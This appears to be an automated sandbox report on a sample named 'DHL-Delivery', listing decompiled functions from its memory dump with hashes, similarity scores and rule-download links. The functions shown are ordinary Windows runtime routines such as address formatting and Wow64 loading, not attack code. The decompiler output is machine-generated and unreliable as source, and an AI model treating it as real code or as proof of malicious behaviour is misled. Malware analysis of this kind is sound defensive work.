                        • Opcode ID: 864a4841bf14881472d8641397c5c174d208adea2aff330454295de6e3329379
                        • Instruction ID: 2e2678fe5dadc034021e0623dec6ed8e266a80698886cd5dc6a8a88b286c862c
                        • Opcode Fuzzy Hash: 864a4841bf14881472d8641397c5c174d208adea2aff330454295de6e3329379
                        • Instruction Fuzzy Hash: 3B81B570E0424B8EEB04CE69CD607EEBBB7AF45350FB8476AEC51AB285C73558C08758
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 1E11BE40, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                        Download Yara Rule
                        C-Code - Quality: 93%
                        			E1E11BE40(intOrPtr* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v138;
				char _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t27;
				void* _t28;
				char* _t30;
				short _t31;
				signed int _t34;
				signed int _t41;
				signed char _t47;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr _t56;
				void* _t57;
				signed int _t60;
				void* _t61;

				_v8 =  *0x1e1d6360 ^ _t60;
				_t48 = _a4;
				_v144 = _a8;
				_t27 = _a16;
				_v148 = _t27;
				_t47 = _a12 & 0x0000ffff;
				_t55 = _a20;
				if(_a4 == 0 || _t55 == 0) {
					L9:
					_t28 = 0xc000000d;
				} else {
					if(_t27 == 0) {
						if( *_t55 != 0) {
							goto L9;
						} else {
							goto L3;
						}
					} else {
						L3:
						_t30 =  &_v140;
						if(_t47 != 0) {
							_t31 = 0x5b;
							_v140 = _t31;
							_t30 =  &_v138;
						}
						_t57 = E1E11BF00(_t48, _t30);
						_t33 = _v144;
						if(_v144 != 0) {
							_t34 = E1E12DED0(_t57,  &_v10 - _t57 >> 1, L"%%%u", _t33);
							_t61 = _t61 + 0x10;
							_t57 = _t57 + _t34 * 2;
						}
						if(_t47 != 0) {
							_t41 = E1E12DED0(_t57,  &_v10 - _t57 >> 1, L"]:%u", _t47 & 0x0000ffff);
							_t61 = _t61 + 0x10;
							_t57 = _t57 + _t41 * 2;
						}
						_t56 = (_t57 -  &_v140 >> 1) + 1;
						 *_t55 = _t56;
						if( *_t55 < _t56) {
							goto L9;
						} else {
							E1E126370(_v148,  &_v140, _t56 + _t56);
							_t28 = 0;
						}
					}
				}
				return E1E1225C0(_t28, _t47, _v8 ^ _t60, _t54, _t55, _t56);
			}

























                        0x1e11be52
                        0x1e11be58
                        0x1e11be5b
                        0x1e11be61
                        0x1e11be64
                        0x1e11be6b
                        0x1e11be71
                        0x1e11be76
                        0x1e11bef4
                        0x1e11bef4
                        0x1e11be7c
                        0x1e11be7e
                        0x1e15699a
                        0x00000000
                        0x1e1569a0
                        0x00000000
                        0x1e1569a0
                        0x1e11be84
                        0x1e11be84
                        0x1e11be84
                        0x1e11be8d
                        0x1e1569a7
                        0x1e1569a8
                        0x1e1569af
                        0x1e1569af
                        0x1e11be9a
                        0x1e11be9c
                        0x1e11bea4
                        0x1e1569c9
                        0x1e1569ce
                        0x1e1569d1
                        0x1e1569d1
                        0x1e11bead
                        0x1e1569ef
                        0x1e1569f4
                        0x1e1569f7
                        0x1e1569f7
                        0x1e11bebf
                        0x1e11bec0
                        0x1e11bec4
                        0x00000000
                        0x1e11bec6
                        0x1e11bed7
                        0x1e11bedf
                        0x1e11bedf
                        0x1e11bec4
                        0x1e11be7e
                        0x1e11bef1

                        APIs
                          • Part of subcall function 1E11BF00: ___swprintf_l.LIBCMT ref: 1E11BFAE
                          • Part of subcall function 1E11BF00: ___swprintf_l.LIBCMT ref: 1E11BFD3
                        • ___swprintf_l.LIBCMT ref: 1E1569C9
                        • ___swprintf_l.LIBCMT ref: 1E1569EF
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: ___swprintf_l
                        • String ID: %%%u$]:%u
                        • API String ID: 48624451-3050659472
                        • Opcode ID: f22df8ad984be550f87d82de323bd36cead9ae902ccab069c62a864d37d23f69
                        • Instruction ID: f639f191e8e211dc0d3349a918b674750723c9bd669d8760476e9150e987641e
                        • Opcode Fuzzy Hash: f22df8ad984be550f87d82de323bd36cead9ae902ccab069c62a864d37d23f69
                        • Instruction Fuzzy Hash: 13318675501219DEDB10CF39DD50FEA77B9FF44210F51466AE94AD7200EB30AE848BA1
                        Uniqueness

                        Uniqueness Score: 0.10%

                        Function 1E162F80, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81timeUNIQUE
                        Download Yara Rule
                        C-Code - Quality: 31%
                        			E1E162F80(void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* __ebx;
				void* _t21;
				intOrPtr _t36;
				void* _t39;

				_t21 = E1E0FB120(0, 0, 0x1e0b1b68,  &_v8);
				if(_t21 < 0) {
					return _t21;
				}
				_t42 = _v8;
				if(E1E0EB310(_v8, 0x1e0b1b78, 0,  &_v12, 0, _v0) >= 0) {
					_t42 = _v8;
					if(E1E0EB310(_v8, 0x1e0b1b70, 0,  &_v20, 0, _v0) >= 0) {
						_t42 = _v8;
						if(E1E0EB310(_v8, 0x1e0b1b80, 0,  &_v16, 0, _v0) >= 0) {
							_t36 = _v12;
							 *0x1e1d41e0(0, L"Wow64 Emulation Layer", __edi);
							_t39 = _v12();
							if(_t39 != 0) {
								 *0x1e1d41e0(_t39, 4, 0, _a12, 0, _a4, 0, _a8, 0);
								_v16();
								_t36 = _v20;
								 *0x1e1d41e0(_t39);
								_v20();
							}
						}
					}
				}
				return E1E0FB800(0, _t36, _t42);
			}












                        0x1e162f96
                        0x1e162f9d
                        0x1e163043
                        0x1e163043
                        0x1e162fa7
                        0x1e162fbd
                        0x1e162fc2
                        0x1e162fd8
                        0x1e162fdd
                        0x1e162ff3
                        0x1e162ff5
                        0x1e162fff
                        0x1e163008
                        0x1e16300c
                        0x1e163021
                        0x1e163027
                        0x1e16302a
                        0x1e16302e
                        0x1e163034
                        0x1e163034
                        0x1e163037
                        0x1e162ff3
                        0x1e162fd8
                        0x00000000

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: Wow64 Emulation Layer
                        • API String ID: 3446177414-921169906
                        • Opcode ID: 0979554c2604e1e718f48d6e5514749715d2fb419eccaab32b6e38d47757a5e0
                        • Instruction ID: 0554e713b14f0dfb2e2052beb528bb839a72ff9849779ae4908d3ff92025845b
                        • Opcode Fuzzy Hash: 0979554c2604e1e718f48d6e5514749715d2fb419eccaab32b6e38d47757a5e0
                        • Instruction Fuzzy Hash: 53214A7950115EBFAF11DAA08C84DFF7B7CFF88298F100664FE01A2100D730AE159B60
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 1E1B6D26, Relevance: 6.2, APIs: 4, Instructions: 171timeCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID:
                        • API String ID: 3446177414-0
                        • Opcode ID: b54ddf134704d246354cbae1192e7b778ab7a21c48ce1e6416941cb9542374a2
                        • Instruction ID: 95e407c792453a464667980a18adecebd40cba695a0ece11de594ef486e94bc1
                        • Opcode Fuzzy Hash: b54ddf134704d246354cbae1192e7b778ab7a21c48ce1e6416941cb9542374a2
                        • Instruction Fuzzy Hash: 92517D35B11622DFDB08CE19C9E0629B7F2FF69310B254A6DD90ADB754DB70AC91CB80
                        Uniqueness

                        Uniqueness Score: 0.70%

                        Function 1E10FEC0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141timeUNIQUE
                        Download Yara Rule
                        APIs
                        Strings
                        • GsHd, xrefs: 1E10FF5A
                        • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 1E14F668
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section
                        • API String ID: 3446177414-2815354625
                        • Opcode ID: 707dff11d23a109502bb614f0be4cdc797384fddc7f188910dfc0b2a2721133e
                        • Instruction ID: c1942b401cb30717595533a5cc7c3064c1c090bd4458d67a6451da5f28a6bd7a
                        • Opcode Fuzzy Hash: 707dff11d23a109502bb614f0be4cdc797384fddc7f188910dfc0b2a2721133e
                        • Instruction Fuzzy Hash: 4A51B0B26083469FD711CF11C985A9BBBE5FF8D354F100A2DF89596250D730E9C9CBA2
                        Uniqueness

                        Uniqueness Score: 100.00%